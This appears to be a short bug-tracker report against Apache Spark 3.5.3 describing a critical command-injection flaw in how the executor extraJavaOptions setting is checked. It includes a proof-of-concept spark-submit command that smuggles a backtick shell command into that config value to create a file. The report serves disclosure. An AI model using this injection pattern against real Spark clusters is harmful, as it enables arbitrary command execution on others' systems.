Details
-
Bug
-
Status: Open
-
Critical
-
Resolution: Unresolved
-
3.5.3
-
None
-
None
Description
Spark allow user to deploy jar packet with`extraJavaOptions` ,
but spark has incomplete check of it, leading to command execution.
using below command can see the /abc file was created:
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/abc\`" test.jar